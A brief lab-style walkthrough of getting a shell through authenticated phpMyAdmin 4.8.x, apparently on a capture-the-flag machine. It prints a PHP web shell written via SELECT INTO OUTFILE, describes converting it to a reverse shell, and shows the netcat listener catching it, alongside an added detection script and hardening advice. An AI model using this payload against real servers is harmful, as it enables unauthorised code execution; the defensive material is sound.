phpMyAdmin exploit on versions 4.8.0 and 4.8.1

We have a phpMyAdmin page and login credentials for it. The phpMyAdmin version is 4.8.

Refer to the logged-in page (screenshot).

As per searchsploit, there is an LFI vulnerability if the user is authenticated.


It says the exploit allows malicious code to be supplied as an SQL query if the user is authenticated. In this case we are authenticated, so let's insert the code below into the SQL query option.

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell3.php"
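Added example, not part of the original writeup: a defender-side scan of MySQL general query log lines for the INTO OUTFILE write shown above. It assumes the general query log is enabled; the log line layout, sample lines and web root list are constructed for illustration.

```python
import posixpath
import re

# Assumption: directories served by the web server; adjust to the host's document roots.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/www/")
SCRIPT_EXT = (".php", ".phtml", ".phar")

# SELECT ... INTO OUTFILE|DUMPFILE '<path>' with either quote style.
OUTFILE_RE = re.compile(
    r"""\binto\s+(outfile|dumpfile)\s+(['"])(?P<path>.+?)\2""", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

def classify(line):
    """Return None if the query writes no file, else a finding dict."""
    m = OUTFILE_RE.search(line)
    if not m:
        return None
    # Normalise so a path such as /tmp/../var/www/html/x.php is still caught.
    path = posixpath.normpath(m.group("path"))
    reasons = []
    if path.startswith(WEB_ROOTS):
        reasons.append("writes under web root")
    if path.lower().endswith(SCRIPT_EXT):
        reasons.append("script extension")
    if PHP_TAG_RE.search(line):
        reasons.append("PHP tag in query text")
    severity = "high" if len(reasons) >= 2 else "medium" if reasons else "info"
    return {"path": path, "severity": severity, "reasons": reasons}

def scan(lines):
    """Classify every line and keep only those that write a file."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample lines in general-query-log style (timestamps and tables are made up).
SAMPLE_LOG = [
    '2019-06-01T10:00:01.000000Z   12 Query  SELECT * FROM shop.orders',
    '2019-06-01T10:00:05.000000Z   12 Query  SELECT "<?php system($_GET[\'c\']); ?>" into outfile "/var/www/html/shell3.php"',
    "2019-06-01T10:01:00.000000Z   15 Query  SELECT id FROM t INTO OUTFILE '/var/lib/mysql-files/export.csv'",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["path"], ", ".join(f["reasons"]))
```

Setting secure_file_priv to a directory outside the web root and revoking the FILE privilege from the account phpMyAdmin logs in with prevents this write in the first place.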


I have added the reverse shell code and encoded it using Burp. (Use the same c=id command from the browser and modify it to a reverse shell command in Burp.) Use Ctrl+U to encode in Burp.


I have the reverse shell once we access the newly uploaded

$ rlwrap nc -nvlp 4242 
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.143] 44524
/bin/sh: 0: can't access tty; job control turned off
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/sh")'
$